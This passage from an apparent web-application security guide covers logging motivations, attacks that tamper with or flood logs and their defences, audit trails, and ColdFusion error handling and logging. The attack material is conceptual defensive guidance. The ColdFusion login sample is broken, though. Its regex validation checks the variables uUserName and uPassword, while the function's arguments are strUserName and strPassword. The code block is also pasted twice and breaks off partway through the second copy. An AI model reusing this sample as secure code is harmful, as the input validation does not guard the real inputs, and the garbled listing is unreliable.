Repetitive polls can be protocol led so that network outages or server shutdowns get protocolled and the behavior can either be analyzed later on or a responsible person can take immediate actions.&lt;br /&gt;
&lt;br /&gt;
===Proof of validity ===&lt;br /&gt;
&lt;br /&gt;
Application developers sometimes write logs to prove to customers that their applications are behaving as expected.&lt;br /&gt;
&lt;br /&gt;
* Required by law or corporate policies.&lt;br /&gt;
&lt;br /&gt;
* Logs can provide individual accountability in the web application system universe by tracking a user's actions.&lt;br /&gt;
&lt;br /&gt;
It can be corporate policy or local law to be required to (for example) save header information of all application transactions. These logs must then be kept safe and confidential for six months before they can be deleted.&lt;br /&gt;
&lt;br /&gt;
The points from above show all different motivations and result in different requirements and strategies. This means, that before we can implement a logging mechanism into an application or system, we have to know the requirements and their later usage. If we fail in doing so this can lead to unintentional results.&lt;br /&gt;
&lt;br /&gt;
Failure to enable or design the proper event logging mechanisms in the web application may undermine an organization's ability to detect unauthorized access attempts, and the extent to which these attempts may or may not have succeeded. We will look into the most common attack methods, design and implementation errors, as well as the mitigation strategies later on in this chapter.&lt;br /&gt;
&lt;br /&gt;
There is another reason why the logging mechanism must be planned before implementation. In some countries, laws define what kind of personal information is allowed to be not only logged but also analyzed. For example, in Switzerland, companies are not allowed to log personal information of their employees (like what they do on the internet or what they write in their emails). So if a company wants to log a worker's surfing habits, the corporation needs to inform her of their plans in advance.&lt;br /&gt;
&lt;br /&gt;
This leads to the requirement of having anonymized logs or de-personalized logs with the ability to re-personalized them later on if need be. If an unauthorized person has access to (legally) personalized logs, the corporation is acting unlawful. So there can be a few (not only) legal traps that must be kept in mind.&lt;br /&gt;
&lt;br /&gt;
===Logging types ===&lt;br /&gt;
&lt;br /&gt;
Logs can contain different kinds of data. The selection of the data used is normally affected by the motivation leading to the logging. This section contains information about the different types of logging information and the reasons why we could want to log them.&lt;br /&gt;
&lt;br /&gt;
In general, the logging features include appropriate debugging information such as time of event, initiating process or owner of process, and a detailed description of the event. The following are types of system events that can be logged in an application. It depends on the particular application or system and the needs to decide which of these will be used in the logs:&lt;br /&gt;
&lt;br /&gt;
* Reading of data file access and what kind of data is read. This not only allows to see if data was read but also by whom and when.&lt;br /&gt;
&lt;br /&gt;
* Writing of data logs also where and with what mode (append, replace) data was written. This can be used to see if data was overwritten or if a program is writing at all.&lt;br /&gt;
&lt;br /&gt;
* Modification of any data characteristics, including access control permissions or labels, location in database or file system, or data ownership. Administrators can detect if their configurations were changed.&lt;br /&gt;
&lt;br /&gt;
* Administrative functions and changes in configuration regardless of overlap (account management actions, viewing any user's data, enabling or disabling logging, etc.)&lt;br /&gt;
&lt;br /&gt;
* Miscellaneous debugging information that can be enabled or disabled on the fly.&lt;br /&gt;
&lt;br /&gt;
* All authorization attempts (include time) like success/failure, resource or function being authorized, and the user requesting authorization. We can detect password guessing with these logs. These kinds of logs can be fed into an Intrusion Detection system that will detect anomalies.&lt;br /&gt;
&lt;br /&gt;
* Deletion of any data (object). Sometimes applications are required to have some sort of versioning in which the deletion process can be cancelled.&lt;br /&gt;
&lt;br /&gt;
* Network communications (bind, connect, accept, etc.). With this information an Intrusion Detection system can detect port scanning and brute force attacks.&lt;br /&gt;
&lt;br /&gt;
* All authentication events (logging in, logging out, failed logins, etc.) that allow to detect brute force and guessing attacks too.&lt;br /&gt;
&lt;br /&gt;
==Noise ==&lt;br /&gt;
&lt;br /&gt;
Noise is intentionally invoking security errors to fill an error log with entries (noise) that hide the incriminating evidence of a successful intrusion. When the administrator or log parser application reviews the logs, there is every chance that they will summarize the volume of log entries as a denial of service attempt rather than identifying the 'needle in the haystack'.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
This is difficult since applications usually offer an unimpeded route to functions capable of generating log events. If you can deploy an intelligent device or application component that can shun an attacker after repeated attempts, then that would be beneficial. Failing that, an error log audit tool that can reduce the bulk of the noise, based on repetition of events or originating from the same source for example. It is also useful if the log viewer can display the events in order of severity level, rather than just time based.&lt;br /&gt;
&lt;br /&gt;
==Cover Tracks ==&lt;br /&gt;
&lt;br /&gt;
The top prize in logging mechanism attacks goes to the contender who can delete or manipulate log entries at a granular level, &amp;quot;as though the event never even happened!&amp;quot;. Intrusion and deployment of rootkits allows an attacker to utilize specialized tools that may assist or automate the manipulation of known log files. In most cases, log files may only be manipulated by users with root / administrator privileges, or via approved log manipulation applications. As a general rule, logging mechanisms should aim to prevent manipulation at a granular level since an attacker can hide their tracks for a considerable length of time without being detected. Simple question; if you were being compromised by an attacker, would the intrusion be more obvious if your log file was abnormally large or small, or if it appeared like every other day's log?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Assign log files the highest security protection, providing reassurance that you always have an effective 'black box' recorder if things go wrong. This includes:&lt;br /&gt;
&lt;br /&gt;
*Applications should not run with Administrator, or root-level privileges. This is the main cause of log file manipulation success since super users typically have full file system access. Assume the worst case scenario and suppose your application is exploited. Would there be any other security layers in place to prevent the application's user privileges from manipulating the log file to cover tracks?&lt;br /&gt;
&lt;br /&gt;
*Ensuring that access privileges protecting the log files are restrictive, reducing the majority of operations against the log file to alter and read.&lt;br /&gt;
&lt;br /&gt;
*Ensuring that log files are assigned object names that are not obvious and stored in a safe location of the file system.&lt;br /&gt;
&lt;br /&gt;
*Writing log files using publicly or formally scrutinized techniques in an attempt to reduce the risk associated with reverse engineering or log file manipulation.&lt;br /&gt;
&lt;br /&gt;
*Writing log files to read-only media (where event log integrity is of critical importance).&lt;br /&gt;
&lt;br /&gt;
*Use of hashing technology to create digital fingerprints. The idea is that if an attacker does manipulate the log file, then the digital fingerprint will not match and an alert generated.&lt;br /&gt;
&lt;br /&gt;
*Use of host-based IDS technology where normal behavioral patterns can be 'set in stone'. Attempts by attackers to update the log file through anything but the normal approved flow would generate an exception and the intrusion can be detected and blocked. This is one security control that can safeguard against simplistic administrator attempts at modifications.&lt;br /&gt;
&lt;br /&gt;
==False Alarms ==&lt;br /&gt;
&lt;br /&gt;
Taking cue from the classic 1966 film &amp;quot;How to Steal a Million&amp;quot;, or similarly the fable of Aesop; &amp;quot;The Boy Who Cried Wolf&amp;quot;, be wary of repeated false alarms, since this may represent an attacker's actions in trying to fool the security administrator into thinking that the technology is faulty and not to be trusted until it can be fixed.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Simply be aware of this type of attack, take every security violation seriously, always get to the bottom of the cause event log errors rather, and don't just dismiss errors unless you can be completely sure that you know it to be a technical problem.&lt;br /&gt;
&lt;br /&gt;
===Denial of Service ===&lt;br /&gt;
&lt;br /&gt;
By repeatedly hitting an application with requests that cause log entries, multiply this by ten thousand, and the result is that you have a large log file and a possible headache for the security administrator. Where log files are configured with a fixed allocation size, then once full, all logging will stop and an attacker has effectively denied service to your logging mechanism. Worse still, if there is no maximum log file size, then an attacker has the ability to completely fill the hard drive partition and potentially deny service to the entire system. This is becoming more of a rarity though with the increasing size of today's hard disks.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
The main defense against this type of attack are to increase the maximum log file size to a value that is unlikely to be reached, place the log file on a separate partition to that of the operating system or other critical applications and best of all, try to deploy some kind of system monitoring application that can set a threshold against your log file size and/or activity and issue an alert if an attack of this nature is underway.&lt;br /&gt;
&lt;br /&gt;
==Destruction ==&lt;br /&gt;
&lt;br /&gt;
Following the same scenario as the Denial of Service above, if a log file is configured to cycle round overwriting old entries when full, then an attacker has the potential to do the evil deed and then set a log generation script into action in an attempt to eventually overwrite the incriminating log entries, thus destroying them.&lt;br /&gt;
&lt;br /&gt;
If all else fails, then an attacker may simply choose to cover their tracks by purging all log file entries, assuming they have the privileges to perform such actions. This attack would most likely involve calling the log file management program and issuing the command to clear the log, or it may be easier to simply delete the object which is receiving log event updates (in most cases, this object will be locked by the application). This type of attack does make an intrusion obvious assuming that log files are being regularly monitored, and does have a tendency to cause panic as system administrators and managers realize they have nothing upon which to base an investigation on.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Following most of the techniques suggested above will provide good protection against this attack. Keep in mind two things:&lt;br /&gt;
&lt;br /&gt;
*Administrative users of the system should be well trained in log file management and review. 'Ad-hoc' clearing of log files is never advised and an archive should always be taken. Too many times a log file is cleared, perhaps to assist in a technical problem, erasing the history of events for possible future investigative purposes.&lt;br /&gt;
&lt;br /&gt;
*An empty security log does not necessarily mean that you should pick up the phone and fly the forensics team in. In some cases, security logging is not turned on by default and it is up to you to make sure that it is. Also, make sure it is logging at the right level of detail and benchmark the errors against an established baseline in order measure what is considered 'normal' activity.&lt;br /&gt;
&lt;br /&gt;
==Audit Trails ==&lt;br /&gt;
&lt;br /&gt;
Audit trails are legally protected in many countries, and should be logged into high integrity destinations to prevent casual and motivated tampering and destruction. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Do the logs transit in the clear between the logging host and the destination?&lt;br /&gt;
&lt;br /&gt;
* Do the logs have a HMAC or similar tamper proofing mechanism to prevent change from the time of the logging activity to when it is reviewed?&lt;br /&gt;
&lt;br /&gt;
* Can relevant logs be easily extracted in a legally sound fashion to assist with prosecutions?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Only audit truly important events – you have to keep audit trails for a long time, and debug or informational messages are wasteful&lt;br /&gt;
&lt;br /&gt;
* Log centrally as appropriate and ensure primary audit trails are not kept on vulnerable systems, particularly front end web servers&lt;br /&gt;
&lt;br /&gt;
* Only review copies of the logs, not the actual logs themselves&lt;br /&gt;
&lt;br /&gt;
* Ensure that audit logs are sent to trusted systems&lt;br /&gt;
&lt;br /&gt;
* For highly protected systems, use write-once media or similar to provide trust worthy long term log repositories&lt;br /&gt;
&lt;br /&gt;
* For highly protected systems, ensure there is end-to-end trust in the logging mechanism. World writeable logs, logging agents without credentials (such as SNMP traps, syslog etc) are legally vulnerable to being excluded from prosecution &lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* Oracle Auditing&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.sans.org/atwork/description.php?cid=738&amp;lt;/u&amp;gt;   [[category:FIXME|broken link]]&lt;br /&gt;
&lt;br /&gt;
* Sarbanes Oxley for IT security&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.securityfocus.com/columnists/322&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Java Logging Overview&lt;br /&gt;
&amp;lt;u&amp;gt;http://java.sun.com/javase/6/docs/technotes/guides/logging/overview.html&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Error Handling and Logging ==&lt;br /&gt;
&lt;br /&gt;
All applications have failures – whether they occur during compilation or runtime. Most programming languages will throw runtime exceptions for illegally executing code (e.g. syntax errors) often in the form of cryptic system messages. These failures and resulting system messages can lead to several security risks if not handled properly including; enumeration, buffer attacks, sensitive information disclosure, etc.  If an attack occurs it is important that forensics personnel be able to trace the attacker’s tracks via adequate logging.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
ColdFusion provides structured exception handling and logging tools. These tools can help developers customize error handling to prevent unwanted disclosure, and provide customized logging for error tracking and audit trails. These tools should be combined with web server, J2EE application server, and operating system tools to create the full system/application security overview.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Error Handling'''&lt;br /&gt;
&lt;br /&gt;
Hackers can use the information exposed by error messages. Even missing templates errors (HTTP 404) can expose your server to attacks (e.g. buffer overflow, XSS, etc.). If you enable the Robust Exception Information debugging option, ColdFusion will display:&lt;br /&gt;
&lt;br /&gt;
Physical path of template &lt;br /&gt;
&lt;br /&gt;
URI of template &lt;br /&gt;
&lt;br /&gt;
Line number and line snippet &lt;br /&gt;
&lt;br /&gt;
SQL statement used (if any) &lt;br /&gt;
&lt;br /&gt;
Data source name (if any) &lt;br /&gt;
&lt;br /&gt;
Java stack trace&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
ColdFusion provides tags and functions for developers to use to customize error handling. Administrators can specify default templates in the ColdFusion Administrator (CFAM) to handle unknown or unhandled exceptions. ColdFusion’s structure exception handling works in the following order:&lt;br /&gt;
&lt;br /&gt;
Template level (ColdFusion templates and components)&lt;br /&gt;
&lt;br /&gt;
ColdFusion exception handling tags: cftry, cfcatch, cfthrow, and cfrethrow&lt;br /&gt;
&lt;br /&gt;
try and catch statements in CFScript&lt;br /&gt;
&lt;br /&gt;
Application level (Application.cfc/cfm)&lt;br /&gt;
&lt;br /&gt;
Specify custom templates for individual exceptions types with the cferror tag&lt;br /&gt;
&lt;br /&gt;
Application.cfc onError method to handle uncaught application exceptions&lt;br /&gt;
&lt;br /&gt;
System level (ColdFusion Administrator settings)&lt;br /&gt;
&lt;br /&gt;
Missing Template Handler execute when a requested ColdFusion template is not found&lt;br /&gt;
&lt;br /&gt;
Site-wide Error Handler executes globally for all unhandled exceptions on the server&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Best Practices '''&lt;br /&gt;
&lt;br /&gt;
*Do not allow exceptions to go unhandled&lt;br /&gt;
&lt;br /&gt;
*Do not allow any exceptions to reach the browser&lt;br /&gt;
&lt;br /&gt;
*Display custom error pages to users with an email link for feedback&lt;br /&gt;
&lt;br /&gt;
*Do not enable “Robust Exception Information” in production.&lt;br /&gt;
&lt;br /&gt;
*Specify custom pages for ColdFusion to display in each of the following cases: &lt;br /&gt;
**When a ColdFusion page is missing (the Missing Template Handler page) &lt;br /&gt;
**When an otherwise-unhandled exception error occurs during the processing of a page (the Site-wide Error Handler page) &lt;br /&gt;
**You specify these pages on the Settings page in the Server Settings are in the ColdFusion MX Administrator; for more information, see the ColdFusion MX Administrator Help.&lt;br /&gt;
&lt;br /&gt;
*Use the cferror tag to specify ColdFusion pages to handle specific types of errors. &lt;br /&gt;
&lt;br /&gt;
*Use the cftry, cfcatch, cfthrow, and cfrethrow tags to catch and handle exception errors directly on the page where they occur. &lt;br /&gt;
&lt;br /&gt;
*In CFScript, use the try and catch statements to handle exceptions. &lt;br /&gt;
&lt;br /&gt;
*Use the onError event in Application.cfc to handle exception errors that are not handled by try/catch code on the application pages. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Logging'''&lt;br /&gt;
&lt;br /&gt;
Log files can help with application debugging and provide audit trails for attack detection. ColdFusion provides several logs for different server functions. It leverages the Apache Log4j libraries for customized logging. It also provides logging tags to assist in application debugging. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following is a partial list of ColdFusion log files and their descriptions''' '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{| border=1&lt;br /&gt;
&lt;br /&gt;
 || Log file  || Description &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || application.log || Records every ColdFusion MX error reported to a user. Application page errors, including ColdFusion MX syntax, ODBC, and SQL errors, are written to this log file.&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || exception.log  || Records stack traces for exceptions that occur in ColdFusion.&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || scheduler.log || Records scheduled events that have been submitted for execution. Indicates whether task submission was initiated and whether it succeeded. Provides the scheduled page URL, the date and time executed, and a task ID.&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || server.log || Records start up messages and errors for ColdFusion MX.&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || customtag.log || Records errors generated in custom tag processing.&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || mail.log || Records errors generated by an SMTP mail server.&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || mailsent.log || Records messages sent by ColdFusion MX.&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || flash.log || Records entries for Macromedia Flash Remoting.&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The CFAM contains the Logging Settings and log viewer screens. Administrators can configure the log directory, maximum log file size, and maximum number of archives. It also allows administrators to log slow running pages, CORBA calls, and scheduled task execution. The log viewer allows viewing, filtering, and searching of any log files in the log directory (default is cf_root/logs). Administrators can archive, save, and delete log files as well.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The cflog and cftrace tags allow developer to create customized logging. &amp;lt;cflog&amp;gt; can write custom messages to the Application.log, Scheduler.log, or a custom log file. The custom log file must be in the default log directory – if it does not exist ColdFusion will create it. &amp;lt;cftrace&amp;gt; tracks execution times, logic flow, and variable at the time the tag executes. It records the data in the cftrace.log (in the default logs directory) and can display this info either inline or in the debugging output of the current page request. Use &amp;lt;cflog&amp;gt; to write custom error messages, track user logins, and record user activity to a custom log file.  Use &amp;lt;cftrace&amp;gt; to track variables and application state within running requests.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Best Practices'''&lt;br /&gt;
&lt;br /&gt;
*Use &amp;lt;cflog&amp;gt; for customized logging&lt;br /&gt;
&lt;br /&gt;
*Incorporate into custom error handling&lt;br /&gt;
&lt;br /&gt;
*Record application specific messages&lt;br /&gt;
&lt;br /&gt;
*Actively monitor and fix errors in ColdFusion’s logs&lt;br /&gt;
&lt;br /&gt;
*Optimize logging settings &lt;br /&gt;
&lt;br /&gt;
*Rotate log files to keep them current &lt;br /&gt;
&lt;br /&gt;
*Keep files size manageable&lt;br /&gt;
&lt;br /&gt;
*Enable logging of slow running pages&lt;br /&gt;
&lt;br /&gt;
*Set the time interval lower than the configured Timeout Request value in the CFAM Settings screen&lt;br /&gt;
&lt;br /&gt;
*Long running page timings are recorded in the server.log&lt;br /&gt;
&lt;br /&gt;
*Use &amp;lt;cftrace&amp;gt; sparingly for audit trails&lt;br /&gt;
&lt;br /&gt;
*Use with inline=“false”&lt;br /&gt;
&lt;br /&gt;
*Use it to track user input – Form and/or URL variables&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''Best Practices in Action'''''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following code adds error handling and logging to the dbLogin and logout methods in the code from Authentication section.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cffunction name=&amp;quot;dblogin&amp;quot; access=&amp;quot;private&amp;quot; output=&amp;quot;false&amp;quot; returntype=&amp;quot;struct&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfargument name=&amp;quot;strUserName&amp;quot; required=&amp;quot;true&amp;quot; type=&amp;quot;string&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfargument name=&amp;quot;strPassword&amp;quot; required=&amp;quot;true&amp;quot; type=&amp;quot;string&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset var retargs = StructNew()&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cftry&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfif IsValid(&amp;quot;regex&amp;quot;, uUserName, &amp;quot;[A-Za-z0-9%]*&amp;quot;) AND IsValid(&amp;quot;regex&amp;quot;, uPassword, &amp;quot;[A-Za-z0-9%]*&amp;quot;)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfquery name=&amp;quot;loginQuery&amp;quot; dataSource=&amp;quot;#Application.DB#&amp;quot; &amp;gt;&lt;br /&gt;
&lt;br /&gt;
		SELECT hashed_password, salt&lt;br /&gt;
&lt;br /&gt;
		FROM UserTable&lt;br /&gt;
&lt;br /&gt;
		WHERE UserName =&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfqueryparam value=&amp;quot;#strUserName#&amp;quot; cfsqltype=&amp;quot;CF_SQL_VARCHAR&amp;quot; maxlength=&amp;quot;25&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;/cfquery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfif loginQuery.hashed_password EQ Hash(strPassword &amp;amp; loginQuery.salt, &amp;quot;SHA-256&amp;quot; )&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;cfset retargs.authenticated=&amp;quot;YES&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;cfset Session.UserName = strUserName&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;cflog text=&amp;quot;#getAuthUser()# has logged in!&amp;quot; &lt;br /&gt;
&lt;br /&gt;
		  	type=&amp;quot;Information&amp;quot; &lt;br /&gt;
&lt;br /&gt;
			file=&amp;quot;access&amp;quot; &lt;br /&gt;
&lt;br /&gt;
			application=&amp;quot;yes&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;!-- Add code to get roles from database --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;cfelse&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;cfset retargs.authenticated=&amp;quot;NO&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;/cfif&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	  &amp;lt;cfelse&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfset retargs.authenticated=&amp;quot;NO&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	  &amp;lt;/cfif&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	  &amp;lt;cfcatch type=&amp;quot;database&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	  	&amp;lt;cflog text=&amp;quot;Error in dbLogin(). #cfcatch.details#&amp;quot;&lt;br /&gt;
&lt;br /&gt;
	  		type=&amp;quot;Error&amp;quot; &lt;br /&gt;
&lt;br /&gt;
			log=&amp;quot;Application&amp;quot; &lt;br /&gt;
&lt;br /&gt;
			application=&amp;quot;yes&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfset retargs.authenticated=&amp;quot;NO&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfreturn retargs&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	  &amp;lt;/cfcatch&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cftry&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfreturn retargs&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cffunction&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cffunction name=&amp;quot;logout&amp;quot; access=&amp;quot;remote&amp;quot; output=&amp;quot;true&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfargument name=&amp;quot;logintype&amp;quot; type=&amp;quot;string&amp;quot; required=&amp;quot;yes&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfif isDefined(&amp;quot;form.logout&amp;quot;)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cflogout&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset StructClear(Session)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	&amp;lt;cflog text=&amp;quot;#getAuthUser()# has been logged out.&amp;quot; &lt;br /&gt;
&lt;br /&gt;
		type=&amp;quot;Information&amp;quot; &lt;br /&gt;
&lt;br /&gt;
		file=&amp;quot;access&amp;quot; &lt;br /&gt;
&lt;br /&gt;
		application=&amp;quot;yes&amp;quot;&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfif arguments.logintype eq &amp;quot;challenge&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset foo = closeBrowser()&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfelse&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!--- replace this URL to a page logged out users should see ---&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cflocation url=&amp;quot;login.cfm&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cfif&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cfif&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cffunction&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cffunction name=&amp;quot;dblogin&amp;quot; access=&amp;quot;private&amp;quot; output=&amp;quot;false&amp;quot; returntype=&amp;quot;struct&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfargument name=&amp;quot;strUserName&amp;quot; required=&amp;quot;true&amp;quot; type=&amp;quot;string&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfargument name=&amp;quot;strPassword&amp;quot; required=&amp;quot;true&amp;quot; type=&amp;quot;string&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset var retargs = StructNew()&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cftry&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfif IsValid(&amp;quot;regex&amp;quot;, uUserName, &amp;quot;[A-Za-z0-9%]*&amp;quot;) AND IsValid(&amp;quot;regex&amp;quot;, uPassword, &amp;quot;[A-Za-z0-9%]*&amp;quot;)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfquery name=&amp;quot;loginQuery&amp;quot; dataSource=&amp;quot;#Application.DB#&amp;quot; &amp;gt;&lt;br /&gt;
&lt;br /&gt;
		SELECT hashed_password, salt&lt;br /&gt;
&lt;br /&gt;
		FROM UserTable&lt;br /&gt;
&lt;br /&gt;
		WHERE UserName =&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfqueryparam value=&amp;quot;#strUserName#&amp;quot; cfsqltype=&amp;quot;CF_SQL_VARCHAR&amp;quot; maxlength=&amp;quot;25&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;/cfquery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfif loginQuery.hashed_password EQ Hash(strPassword &amp;amp; loginQuery.salt, &amp;quot;SHA-256&amp;quot; )&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;cfset retargs.authenticated=&amp;quot;YES&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;cfset Session.UserName = strUserName&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;cflog text=&amp;quot;#getAuthUser()# has logged in!&amp;quot; &lt;br /&gt;
&lt;br /&gt;
		  	type=&amp;quot;Information&amp;quot; &lt;br /&gt;
&lt;br /&gt;
			file=&amp;quot;access&amp;quot; &lt;br /&gt;
&lt;br /&gt;
			application=&amp;quot;yes&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;!-- Add code to get roles from database --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;cfelse&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;cfset retargs.authenticated=&amp;quot;NO&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;/cfif&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	  &amp;lt;cfelse&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfset retargs.authenticated=&amp;quot;NO&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	  &amp;lt;/cfif&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	  &amp;lt;cfcatch type=&amp;quot;database&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	  	&amp;lt;cflog text=&amp;quot;Error in dbLogin(). #cfcatch.details#&amp;quot;&lt;br /&gt;
&lt;br /&gt;
	  		type=&amp;quot;Error&amp;quot; &lt;br /&gt;
&lt;br /&gt;
			log=&amp;quot;Application&amp;quot; &lt;br /&gt;
&lt;br /&gt;
			application=&amp;quot;yes&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfset retargs.authenticated=&amp;quot;NO&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfreturn retargs&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	  &amp;lt;/cfcatch&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cftry&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfreturn retargs&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cffunction&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cffunction name=&amp;quot;logout&amp;quot; access=&amp;quot;remote&amp;quot; output=&amp;quot;true&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
